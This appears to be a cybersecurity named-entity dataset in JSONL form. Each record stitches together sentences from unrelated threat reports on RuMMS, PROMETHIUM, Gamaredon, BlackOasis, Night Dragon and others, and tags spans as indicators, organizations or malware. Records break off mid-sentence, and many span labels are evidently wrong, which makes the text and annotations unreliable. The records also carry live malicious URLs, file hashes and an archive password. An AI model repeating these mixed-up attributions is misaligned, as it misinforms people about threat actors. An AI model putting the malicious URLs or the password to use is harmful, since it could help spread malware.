"Indicator"}, {"start": 179, "end": 195, "label": "Indicator"}, {"start": 196, "end": 229, "label": "Indicator"}, {"start": 230, "end": 277, "label": "Indicator"}, {"start": 278, "end": 302, "label": "Indicator"}, {"start": 303, "end": 327, "label": "Indicator"}, {"start": 328, "end": 344, "label": "Indicator"}, {"start": 345, "end": 354, "label": "Organization"}, {"start": 361, "end": 375, "label": "Organization"}, {"start": 428, "end": 437, "label": "Organization"}, {"start": 441, "end": 449, "label": "System"}, {"start": 482, "end": 504, "label": "Organization"}, {"start": 566, "end": 573, "label": "Malware"}, {"start": 598, "end": 685, "label": "Indicator"}]}
{"text": "de.postbank.finanzassistent pl.bph de.comdirect.android com.starfinanz.smob.android.sfinanzstatus de.sdvrz.ihb.mobile.app pl.ing.mojeing com.ing.mobile pl.ing.ingksiegowosc com.comarch.security.mobilebanking com.comarch.mobile.investment.ing com.ingcb.mobile.cbportal de.buhl.finanzblick pl.pkobp.iko pl.ipko.mobile pl.inteligo.mobile de.number26.android PROMETHIUM and NEODYMIUM both used an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player that , at the time , was both unknown and unpatched . The complex infection chain begins with a weaponized Of\ufb01ce document named \u201c f.doc \u201d . Schools , colleges , and universities must somehow reconcile tight budgets with the need to deploy a sophisticated enough detection and response capability to find and evict stealthy adversaries like Vice Society .", "spans": [{"start": 0, "end": 27, "label": "Indicator"}, {"start": 28, "end": 34, "label": "Indicator"}, {"start": 35, "end": 55, "label": "Indicator"}, {"start": 56, "end": 97, "label": "Indicator"}, {"start": 98, "end": 121, "label": "Indicator"}, {"start": 122, "end": 136, "label": "Indicator"}, {"start": 137, "end": 151, "label": "Indicator"}, {"start": 152, "end": 172, "label": "Indicator"}, {"start": 173, "end": 207, "label": "Indicator"}, {"start": 208, "end": 241, "label": "Indicator"}, {"start": 242, "end": 267, "label": "Indicator"}, {"start": 268, "end": 287, "label": "Indicator"}, {"start": 288, "end": 300, "label": "Indicator"}, {"start": 301, "end": 315, "label": "Indicator"}, {"start": 316, "end": 334, "label": "Indicator"}, {"start": 335, "end": 354, "label": "Indicator"}, {"start": 355, "end": 365, "label": "Organization"}, {"start": 370, "end": 379, "label": "Organization"}, {"start": 405, "end": 418, "label": "Vulnerability"}, {"start": 566, "end": 571, "label": "System"}, {"start": 589, "end": 594, "label": "Indicator"}, {"start": 599, "end": 606, "label": "Organization"}, {"start": 609, "end": 617, "label": "Organization"}, {"start": 624, "end": 636, "label": "Organization"}, {"start": 799, "end": 811, "label": "Organization"}]}
{"text": "pl.millennium.corpApp eu.transfer24.app pl.aliorbank.aib pl.corelogic.mtoken alior.bankingapp.android com.ferratumbank.mobilebank com.swmind.vcc.android.bzwbk_mobile.app de.schildbach.wallet piuk.blockchain.android com.bitcoin.mwallet com.btcontract.wallet com.bitpay.wallet com.bitpay.copay btc.org.freewallet.app org.electrum.electrum Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks . Hash : 76ea98e1861c1264b340cf3748c3ec74473b04d042cd6bfda9ce51d086cb5a1a That piece explored how Biderman \u2014 who is Jewish \u2014 had become the target of concerted harassment campaigns by anti - Semitic and far - right groups online in the months leading up to the hack .", "spans": [{"start": 57, "end": 76, "label": "Indicator"}, {"start": 77, "end": 101, "label": "Indicator"}, {"start": 102, "end": 129, "label": "Indicator"}, {"start": 130, "end": 169, "label": "Indicator"}, {"start": 170, "end": 190, "label": "Indicator"}, {"start": 191, "end": 214, "label": "Indicator"}, {"start": 215, "end": 234, "label": "Indicator"}, {"start": 235, "end": 256, "label": "Indicator"}, {"start": 257, "end": 274, "label": "Indicator"}, {"start": 275, "end": 291, "label": "Indicator"}, {"start": 292, "end": 314, "label": "Indicator"}, {"start": 315, "end": 336, "label": "Indicator"}, {"start": 461, "end": 525, "label": "Indicator"}, {"start": 550, "end": 558, "label": "Organization"}, {"start": 636, "end": 673, "label": "Organization"}]}
{"text": "com.xapo com.airbitz com.kibou.bitcoin com.qcan.mobile.bitcoin.wallet me.cryptopay.android com.bitcoin.wallet lt.spectrofinance.spectrocoin.android.wallet com.kryptokit.jaxx com.wirex bcn.org.freewallet.app com.hashengineering.bitcoincash.wallet bcc.org.freewallet.app com.coinspace.app btg.org.freewallet.app net.bither In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe . Threat : Gamaredon Pteranodon weaponized document . The threat actor cleared Windows Event Logs on affected backend Exchange servers so further information was not available regarding the PowerShell commands leveraged by the threat actors .", "spans": [{"start": 0, "end": 8, "label": "Indicator"}, {"start": 9, "end": 20, "label": "Indicator"}, {"start": 21, "end": 38, "label": "Indicator"}, {"start": 39, "end": 69, "label": "Indicator"}, {"start": 70, "end": 90, "label": "Indicator"}, {"start": 91, "end": 109, "label": "Indicator"}, {"start": 110, "end": 154, "label": "Indicator"}, {"start": 155, "end": 173, "label": "Indicator"}, {"start": 174, "end": 183, "label": "Indicator"}, {"start": 184, "end": 206, "label": "Indicator"}, {"start": 207, "end": 245, "label": "Indicator"}, {"start": 246, "end": 268, "label": "Indicator"}, {"start": 269, "end": 286, "label": "Indicator"}, {"start": 287, "end": 309, "label": "Indicator"}, {"start": 310, "end": 320, "label": "Indicator"}, {"start": 346, "end": 356, "label": "Organization"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 415, "end": 435, "label": "Organization"}, {"start": 457, "end": 466, "label": "Organization"}, {"start": 467, "end": 477, "label": "Malware"}, {"start": 504, "end": 516, "label": "Organization"}, {"start": 673, "end": 686, "label": "Organization"}]}
{"text": "co.edgesecure.app com.arcbit.arcbit distributedlab.wallet de.schildbach.wallet_test com.aegiswallet com.plutus.wallet com.coincorner.app.crypt eth.org.freewallet.app secret.access secret.pattern RuMMS : The Latest Family of Android Malware Attacking Users in Russia Via SMS Phishing April 26 , 2016 Introduction Recently we observed an Android malware family being used to attack users in Russia . Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers . Brief Description : Doc \ufb01le weaponized with Exploit . Although Mandiant has no data on the objectives of this threat actor , their broad targeting across industries and geographies is consistent with a targeting calculus most commonly seen among financially motivated groups .", "spans": [{"start": 0, "end": 17, "label": "Indicator"}, {"start": 18, "end": 35, "label": "Indicator"}, {"start": 36, "end": 57, "label": "Indicator"}, {"start": 58, "end": 83, "label": "Indicator"}, {"start": 84, "end": 99, "label": "Indicator"}, {"start": 100, "end": 117, "label": "Indicator"}, {"start": 118, "end": 142, "label": "Indicator"}, {"start": 143, "end": 165, "label": "Indicator"}, {"start": 166, "end": 179, "label": "Indicator"}, {"start": 180, "end": 194, "label": "Indicator"}, {"start": 195, "end": 200, "label": "Malware"}, {"start": 224, "end": 231, "label": "System"}, {"start": 336, "end": 343, "label": "Malware"}, {"start": 410, "end": 419, "label": "Organization"}, {"start": 534, "end": 542, "label": "System"}, {"start": 644, "end": 652, "label": "Organization"}]}
{"text": "The malware samples were mainly distributed through a series of malicious subdomains registered under a legitimate domain belonging to a well-known shared hosting service provider in Russia . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload . Ssdeep : 768:u0foGtYZKQ5QZJQ6hKVsEEIHNDxpy3TI3dU4DKfLX9Eir : uG1aKQ5OwCrItq3TgGfLt9r . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": [{"start": 192, "end": 202, "label": "Organization"}, {"start": 207, "end": 216, "label": "Organization"}, {"start": 229, "end": 245, "label": "Vulnerability"}, {"start": 299, "end": 305, "label": "System"}, {"start": 435, "end": 443, "label": "Organization"}]}
{"text": "Because all the URLs used in this campaign have the form of hxxp : //yyyyyyyy [ . Wingbird , the advanced malware used by NEODYMIUM , has several behaviors that trigger alerts in Windows Defender ATP . The decoy document is written using the ukrainian language mixed to many special chars aimed to lure the target to click on it . A month later , GReAT discovered two more previously unknown infection mechanisms for MiniDuke , which relied on Java and Internet Explorer vulnerabilities to infect the victim \u2019s PC .", "spans": [{"start": 60, "end": 81, "label": "Indicator"}, {"start": 82, "end": 90, "label": "System"}, {"start": 122, "end": 131, "label": "Organization"}, {"start": 179, "end": 199, "label": "Organization"}, {"start": 347, "end": 352, "label": "Organization"}, {"start": 417, "end": 425, "label": "Malware"}, {"start": 444, "end": 486, "label": "Vulnerability"}]}
{"text": "] XXXX.ru/mms.apk ( where XXXX.ru represents the hosting provider \u2019 s domain ) , we named this malware family RuMMS . This volume chronicles two activity groups , code-named PROMETHIUM and NEODYMIUM , both of which target individuals in a specific area of Europe . The document leverages the common exploit aka template injection and tries to download a second stage from \u201c http://win-apu.ddns.net/apu.dot \u201d . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware \u2013 a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": [{"start": 26, "end": 33, "label": "Indicator"}, {"start": 110, "end": 115, "label": "Malware"}, {"start": 145, "end": 160, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 189, "end": 198, "label": "Organization"}, {"start": 374, "end": 405, "label": "Indicator"}, {"start": 467, "end": 479, "label": "Organization"}, {"start": 489, "end": 495, "label": "Organization"}, {"start": 506, "end": 512, "label": "System"}, {"start": 523, "end": 530, "label": "Malware"}, {"start": 562, "end": 571, "label": "Organization"}, {"start": 686, "end": 744, "label": "Organization"}]}
{"text": "To lure the victims to download the malware , threat actors use SMS phishing \u2013 sending a short SMS message containing a malicious URL to the potential victims . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals . Thanks to this exploit ( Remote Code Execution exploit ) the user interaction is not required , in fact the \u201c enable macro \u201d button is not shown . Criminals are also using malvertising via search engines to lure potential victims in .", "spans": [{"start": 228, "end": 237, "label": "Organization"}, {"start": 242, "end": 250, "label": "Organization"}, {"start": 277, "end": 292, "label": "Organization"}, {"start": 326, "end": 346, "label": "Organization"}, {"start": 374, "end": 395, "label": "Vulnerability"}, {"start": 466, "end": 471, "label": "System"}, {"start": 496, "end": 505, "label": "Organization"}, {"start": 521, "end": 581, "label": "Organization"}]}
{"text": "Unwary users who click the seemingly innocuous link will have their device infected with RuMMS malware . In May 2016 , both PROMETHIUM and NEODYMIUM were observed to launch attack campaigns . The downloaded document has a \u201c .dot \u201d extension , used by Microsoft Of\ufb01ce to save templates for different documents with similar formats . The attackers are known for their targeting of highvalue victims , often focusing on organizations in the government , technology , and defense sectors .", "spans": [{"start": 89, "end": 94, "label": "Malware"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 224, "end": 228, "label": "Indicator"}, {"start": 251, "end": 266, "label": "System"}, {"start": 336, "end": 345, "label": "Organization"}, {"start": 379, "end": 396, "label": "Organization"}, {"start": 417, "end": 430, "label": "Organization"}, {"start": 438, "end": 448, "label": "Organization"}, {"start": 451, "end": 461, "label": "Organization"}, {"start": 468, "end": 483, "label": "Organization"}]}
{"text": "Figure 1 describes this infection process and the main behaviors of RuMMS . NEODYMIUM is an activity group that , like PROMETHIUM , conducted an attack campaign in early May 2016 . Basic Information on the \u201c .dot \u201d \ufb01le are provided : The ransom note also makes reference to 3AM", "spans": [{"start": 68, "end": 73, "label": "Malware"}, {"start": 76, "end": 85, "label": "Organization"}, {"start": 92, "end": 106, "label": "Organization"}, {"start": 119, "end": 129, "label": "Organization"}, {"start": 208, "end": 212, "label": "Indicator"}, {"start": 274, "end": 277, "label": "Malware"}]}
{"text": "On April 3 , 2016 , we still observed new RuMMS samples emerging in the wild . Data about Wingbird activity indicates that it is typically used to attack individuals and individual computers instead of networks . Hash : e2cb06e0a5c14b4c5f58d0e56a1dc10b6a1007cf56c77ae6cb07946c3dfe82d8 . While COSMICENERGY \u2019s capabilities are not significantly different from previous OT malware families \u2019 , its discovery highlights several notable developments in the OT threat landscape .", "spans": [{"start": 42, "end": 47, "label": "Malware"}, {"start": 220, "end": 284, "label": "Indicator"}, {"start": 293, "end": 308, "label": "Malware"}, {"start": 368, "end": 387, "label": "Malware"}]}
{"text": "The earliest identified sample , however , can be traced back to Jan. 18 , 2016 . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence . Threat : Gamaredon Pteranodon loader dot \ufb01le . This type of vulnerability is known as a server - side request forgery ( SSRF ) .", "spans": [{"start": 82, "end": 91, "label": "Organization"}, {"start": 117, "end": 130, "label": "Vulnerability"}, {"start": 149, "end": 159, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 248, "end": 258, "label": "Malware"}, {"start": 317, "end": 355, "label": "Vulnerability"}]}
{"text": "Within this time period , we identified close to 300 samples belonging to this family ( all sample hashes are listed in the Appendix ) . NEODYMIUM used a backdoor detected by Windows Defender as Wingbird , whose characteristics closely match FinFisher , a government-grade commercial surveillance package . Brief Description : Dot \ufb01le enabling the infection of the Gamaredon Pteranodon . Ashley Madison \u2019s parent company \u2014 Toronto - based Avid Life Media \u2014 filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": [{"start": 137, "end": 146, "label": "Organization"}, {"start": 195, "end": 203, "label": "System"}, {"start": 242, "end": 251, "label": "Organization"}, {"start": 365, "end": 374, "label": "Organization"}, {"start": 375, "end": 385, "label": "Malware"}, {"start": 388, "end": 420, "label": "Organization"}, {"start": 439, "end": 454, "label": "Organization"}, {"start": 546, "end": 561, "label": "Organization"}]}
{"text": "After landing on the victim \u2019 s phone , the RuMMS apps will request device administrator privileges , remove their icons to hide themselves from users , and remain running in the background to perform a series of malicious behaviors . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . Ssdeep : 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ : oI8XoWruHpp/P4 . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": [{"start": 44, "end": 49, "label": "Malware"}, {"start": 274, "end": 289, "label": "Organization"}, {"start": 292, "end": 302, "label": "Organization"}, {"start": 307, "end": 316, "label": "Organization"}, {"start": 375, "end": 390, "label": "Vulnerability"}, {"start": 438, "end": 444, "label": "System"}, {"start": 503, "end": 515, "label": "Malware"}, {"start": 588, "end": 594, "label": "Malware"}, {"start": 599, "end": 608, "label": "Malware"}]}
{"text": "So far we have identified the following behaviors : Sending device information to a remote command and control ( C2 ) server . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . If we decide to open the document , we see that the document is empty , but it requires the enabling of the macro . Spyware can even be used to track the device 's physical location and record from the camera or microphone .", "spans": [{"start": 146, "end": 158, "label": "Organization"}, {"start": 187, "end": 197, "label": "Organization"}, {"start": 200, "end": 209, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 243, "end": 284, "label": "Vulnerability"}, {"start": 287, "end": 300, "label": "Vulnerability"}, {"start": 347, "end": 353, "label": "System"}, {"start": 522, "end": 527, "label": "System"}, {"start": 530, "end": 537, "label": "Malware"}]}
{"text": "Contacting the C2 server for instructions . FinSpy , a final-stage payload that allows for an attacker to covertly learn what a target is talking about and who they are communicating with , is associated with Gamma Group \u2014 which goes by other names , including FinFisher and Lench IT Solutions . The body of the macro can be logically divided into two distinct parts : The Monti ransomware collective has restarted their operations , focusing on institutions in the legal and governmental fields .", "spans": [{"start": 44, "end": 50, "label": "System"}, {"start": 94, "end": 102, "label": "Organization"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 261, "end": 270, "label": "Organization"}, {"start": 312, "end": 317, "label": "System"}, {"start": 373, "end": 400, "label": "Organization"}, {"start": 466, "end": 495, "label": "Organization"}]}
{"text": "Sending SMS messages to financial institutions to query account balances . In the past , BlackOasis messages were designed to appear like news articles from 2016 about political relations between Angola and China . The \ufb01rst one is the setting of the registry key \u201c HKEY_CURRENT_USER\\Software\\Microsoft\\Of\ufb01ce\\ \u201d & Application.Version & _ \u201d \\Word\\Security\\ \u201d and the declaration of some other variables , such as the dropurl \u201c geticons.ddns.net \u201d . In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": [{"start": 89, "end": 99, "label": "Organization"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 466, "end": 474, "label": "Organization"}, {"start": 490, "end": 495, "label": "Malware"}, {"start": 678, "end": 687, "label": "Malware"}]}
{"text": "Uploading any incoming SMS messages ( including the balance inquiry results ) to the remote C2 server . BlackOasis in recent months sent a wave of phishing emails . The second one is the setting of the persistence mechanism through the writing of the vbs code in the Startup folder with name \u201c templates.vbs \u201d . When Bradshaw refused to sell the domain , he and his then - girlfriend were subject to an unrelenting campaign of online harassment and blackmail .", "spans": [{"start": 104, "end": 114, "label": "Organization"}, {"start": 294, "end": 307, "label": "Indicator"}, {"start": 317, "end": 325, "label": "Organization"}, {"start": 355, "end": 383, "label": "Organization"}, {"start": 400, "end": 423, "label": "Organization"}]}
{"text": "Sending C2-specified SMS messages to phone numbers in the victim \u2019 s contacts . PROMETHIUM uses a unique set of tools and methods to perform actions like lateral movement and data exfiltration . This vbs is properly the macro executed by the macro engine of word . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": [{"start": 80, "end": 90, "label": "Organization"}, {"start": 265, "end": 278, "label": "Organization"}]}
{"text": "Forward incoming phone calls to intercept voice-based two-factor authentication . Last year , Microsoft researchers described Neodymium 's behavior as unusual : \" unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . Analyzing the content of \u201c templates.vbs \u201d it is possible to notice that it de\ufb01ne a variable containing a URL like \u201c http://geticons.ddns.net/ADMIN-PC_E42CAF54//autoindex . ]php \u201d obtained from \u201c hxp://get-icons.ddns . ]net/ \u201d & NlnQCJG & \u201c _ \u201d & uRDEJCn & \u201c //autoindex . ]php \u201d , where \u201c NlnQCJG \u201d is the name that identi\ufb01es the computer on the network and \u201c uRDEJCn \u201d is the serial number of drive in hexadecimal encoding . In October , U.S. Senator Elizabeth Warren and Representative Deborah Ross introduced the Ransom Disclosure Act , with the goal of better understanding how cybercriminals are operating .", "spans": [{"start": 94, "end": 103, "label": "Organization"}, {"start": 126, "end": 135, "label": "Organization"}, {"start": 175, "end": 190, "label": "Organization"}, {"start": 249, "end": 257, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}, {"start": 285, "end": 294, "label": "Organization"}, {"start": 406, "end": 419, "label": "Indicator"}, {"start": 496, "end": 551, "label": "Indicator"}, {"start": 575, "end": 656, "label": "Indicator"}, {"start": 819, "end": 848, "label": "Organization"}, {"start": 853, "end": 880, "label": "Organization"}]}
{"text": "Each of these behaviors is under the control of the remote C2 server . The discovery by Kaspersky marks at least the fifth zero-day exploit used by BlackOasis and exposed by security researchers since June 2015 . From this URL it tries to download another stage then storing it into \u201c C:\\Users\\admin\\AppData\\Roaming\\ \u201d path with random name . NjRAT is an open - source remote access trojan ( RAT ) whose source code is freely available and is used by commodity actors and APTs , making the process of attribution more difficult .", "spans": [{"start": 88, "end": 97, "label": "Organization"}, {"start": 123, "end": 139, "label": "Vulnerability"}, {"start": 148, "end": 158, "label": "Organization"}, {"start": 343, "end": 348, "label": "Malware"}, {"start": 355, "end": 397, "label": "Malware"}, {"start": 451, "end": 467, "label": "Organization"}, {"start": 472, "end": 476, "label": "Organization"}]}
{"text": "In other words , the C2 server can specify the message contents to be sent , the time period in which to forward the voice call , and the recipients of outgoing messages . Victims of BlackOasis have been observed in the following countries : Russia , Iraq , Afghanistan , Nigeria , Libya , Jordan , Tunisia , Saudi Arabia , Iran , Netherlands , Bahrain , United Kingdom and Angola . At the end , \u201c templates.vbs \u201d script will force the machine to reboot . PBI Research Services also reported a data breach that exposed information for 4.75 million people .", "spans": [{"start": 183, "end": 193, "label": "Organization"}, {"start": 398, "end": 411, "label": "Indicator"}, {"start": 456, "end": 477, "label": "Organization"}]}
{"text": "As part of our investigation into this malware , we emulated an infected Android device in order to communicate with the RuMMS C2 server . Unlike many activity groups , which typically gather information for monetary gain or economic espionage , PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals . The dropped sample is an SFX archive , like the tradition of Gamaredon implants . Last month , NoEscape posted 7 victims on their leak site .", "spans": [{"start": 73, "end": 80, "label": "System"}, {"start": 121, "end": 126, "label": "Malware"}, {"start": 151, "end": 166, "label": "Organization"}, {"start": 225, "end": 233, "label": "Organization"}, {"start": 246, "end": 256, "label": "Organization"}, {"start": 261, "end": 270, "label": "Organization"}, {"start": 380, "end": 391, "label": "System"}, {"start": 416, "end": 425, "label": "Organization"}, {"start": 450, "end": 458, "label": "Malware"}]}
{"text": "During one session , the C2 server commanded our emulated device to send four different SMS messages to four different phone numbers , all of which were associated with Russian financial institutions . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests . Hash : c1524a4573bc6acbe59e559c2596975c657ae6bbc0b64f943fffca663b98a95f . HHS HC3 pointed out that some emails included a subject line Victim Organization Date Business Review and gave the user the impression they were opening a secure email from their organization .", "spans": [{"start": 222, "end": 232, "label": "Organization"}, {"start": 297, "end": 302, "label": "Organization"}, {"start": 334, "end": 346, "label": "Organization"}, {"start": 366, "end": 430, "label": "Indicator"}, {"start": 433, "end": 440, "label": "Organization"}]}
{"text": "At least three of the messages were intended to check a user \u2019 s account balance at the institution ( we could not confirm the purpose of the fourth ) .Through additional research , we identified several forum posts where victims complained of funds ( up to 600 rubles ) were transferred out of their accounts after RuMMS infected their phones . Kaspersky 's research notes that BlackOasis hacked into computers based in Saudi Arabia . Threat : Gamaredon Pteranodon implant SFX archive . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named \u201c Solar Polygon \u201d ( Figure 2 ) .", "spans": [{"start": 316, "end": 321, "label": "Malware"}, {"start": 346, "end": 355, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}, {"start": 445, "end": 454, "label": "Organization"}, {"start": 455, "end": 465, "label": "Malware"}, {"start": 474, "end": 485, "label": "System"}, {"start": 488, "end": 500, "label": "Malware"}, {"start": 526, "end": 544, "label": "Organization"}, {"start": 627, "end": 639, "label": "Malware"}, {"start": 656, "end": 767, "label": "Indicator"}]}
{"text": "We do not know exactly how many people have been infected with RuMMS malware . All 13 countries where Kaspersky reportedly observed BlackOasis activity are connected to Saudi Arabia in one of three ways : economically ; from a national security perspective ; or due to established policy agreements . Brief Description : SFX Archive First Stage . In particular , we managed to gather details on an individual using the handle Hack520 , who we believe is connected to Winnti .", "spans": [{"start": 63, "end": 68, "label": "Malware"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 426, "end": 433, "label": "Organization"}, {"start": 467, "end": 473, "label": "Organization"}]}
{"text": "However , our data suggests that there have been at least 2,729 infections between January 2016 and early April 2016 , with a peak in March of more than 1,100 infections . The Operation Aurora , named by McAfee and announced in January 2010 , and the WikiLeaks document disclosures of 2010 have highlighted the fact that external and internal threats are nearly impossible to prevent . Ssdeep : 24576:zXwOrRsTQlIIIIwIEuCRqKlF8kmh/ZGg4kAL/WUKN7UMOtcv : zgwR/lIIIIwI6RqoukmhxGgZ+WUKZUMv . Mandiant has tracked KillNet activity back to January 2022 , despite a claim by the collective \u2019s alleged founder that it began operations in 2021 .", "spans": [{"start": 204, "end": 210, "label": "Organization"}, {"start": 251, "end": 260, "label": "Organization"}, {"start": 386, "end": 392, "label": "System"}, {"start": 487, "end": 495, "label": "Organization"}]}
{"text": "Smishing : The Major Way To Distribute RuMMS We have not observed any instances of RuMMS on Google Play or other online app stores . These attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . By simply opening the SFX archive , it is possible to notice two different \ufb01les that are shown below and named respectively \u201c 8957.cmd \u201d and \u201c 28847 \u201d . In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": [{"start": 39, "end": 44, "label": "Malware"}, {"start": 83, "end": 88, "label": "Malware"}, {"start": 92, "end": 103, "label": "System"}, {"start": 161, "end": 179, "label": "Organization"}, {"start": 332, "end": 359, "label": "System"}, {"start": 362, "end": 366, "label": "System"}, {"start": 491, "end": 502, "label": "Organization"}, {"start": 553, "end": 564, "label": "System"}, {"start": 657, "end": 665, "label": "Indicator"}, {"start": 674, "end": 679, "label": "Indicator"}, {"start": 715, "end": 722, "label": "Organization"}]}
{"text": "Smishing ( SMS phishing ) is currently the primary way threat actors are distributing the malware . Night Dragon 's attacks have involved social engineering , spearphishing attacks , exploitation of Microsoft Windows operating systems vulnerabilities , Microsoft Active Directory compromises , and the use of remote administration tools ( RATs ) in targeting and harvesting sensitive competitive proprietary operations and project-financing information with regard to oil and gas field bids and operations . When executed , the SFX archive will be extracted and the \u201c 8957.cmd \u201d will be run . CrowdStrike Falcon will detect the OWASSRF exploit method described in this blog , and will block the method if the prevention setting for \u2022 None Monitor Exchange servers for signs of exploitation visible in IIS and Remote PowerShell logs using this script developed by CrowdStrike Services \u2022 None Consider application - level controls such as web application firewalls .", "spans": [{"start": 100, "end": 112, "label": "Organization"}, {"start": 138, "end": 156, "label": "Organization"}, {"start": 309, "end": 336, "label": "System"}, {"start": 339, "end": 343, "label": "System"}, {"start": 468, "end": 479, "label": "Organization"}, {"start": 528, "end": 539, "label": "System"}, {"start": 568, "end": 576, "label": "Indicator"}, {"start": 593, "end": 611, "label": "System"}, {"start": 739, "end": 763, "label": "System"}, {"start": 768, "end": 831, "label": "Indicator"}, {"start": 863, "end": 883, "label": "Organization"}]}
{"text": "The process starts when an SMS phishing message arrives at a user \u2019 s phone . We have identified the tools , techniques , and network activities used in these continuing attacks\u2014which we have dubbed Night Dragon\u2014as originating primarily in China . At this point , the batch script renames the \u201c 28847 \u201d \ufb01le in \u201c 28847.exe \u201d , opens it using \u201c p\ufb02jk ,fkbcerbgblfhs \u201d as password and the \ufb01le contained inside the \u201c 28847.exe \u201d \ufb01le will be renamed in \u201c WuaucltIC.exe \u201d . Instead , it appeared that corresponding requests were made directly through the Outlook Web Application ( OWA ) endpoint , indicating a previously undisclosed exploit method for Exchange .", "spans": [{"start": 199, "end": 214, "label": "Organization"}, {"start": 295, "end": 300, "label": "Indicator"}, {"start": 312, "end": 321, "label": "Indicator"}, {"start": 412, "end": 421, "label": "Indicator"}, {"start": 449, "end": 462, "label": "Indicator"}, {"start": 494, "end": 654, "label": "Malware"}]}
{"text": "An example SMS message is shown in Figure 1 . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . Finally , it will be run using \u201c post.php \u201d as argument . But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": [{"start": 46, "end": 55, "label": "Organization"}, {"start": 240, "end": 243, "label": "Organization"}, {"start": 246, "end": 249, "label": "Organization"}, {"start": 256, "end": 279, "label": "Organization"}, {"start": 309, "end": 319, "label": "Organization"}, {"start": 470, "end": 478, "label": "Indicator"}, {"start": 569, "end": 585, "label": "Vulnerability"}, {"start": 643, "end": 647, "label": "Organization"}]}
{"text": "The message translates roughly to \u201c You got a photo in MMS format : hxxp : //yyyyyyyy.XXXX.ru/mms.apk. \u201d So far we identified seven different URLs being used to spread RuMMS in the wild . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information . The fact that the \u201c 28847.exe \u201d \ufb01le can be opened makes us understand that the \u201c 28847 \u201d \ufb01le is another SFX \ufb01le . LotLBin techniques also make it difficult for defenders to detect threat activity as they need to not only remain vigilant for new files introduced to their environments , but also for modifications to files already present within their installed OT applications and services .", "spans": [{"start": 68, "end": 102, "label": "Indicator"}, {"start": 168, "end": 173, "label": "Malware"}, {"start": 188, "end": 197, "label": "Organization"}, {"start": 382, "end": 385, "label": "Organization"}, {"start": 388, "end": 391, "label": "Organization"}, {"start": 398, "end": 421, "label": "Organization"}, {"start": 451, "end": 461, "label": "Organization"}, {"start": 599, "end": 608, "label": "Indicator"}, {"start": 660, "end": 665, "label": "Indicator"}, {"start": 683, "end": 686, "label": "System"}, {"start": 693, "end": 711, "label": "Organization"}, {"start": 940, "end": 955, "label": "System"}]}
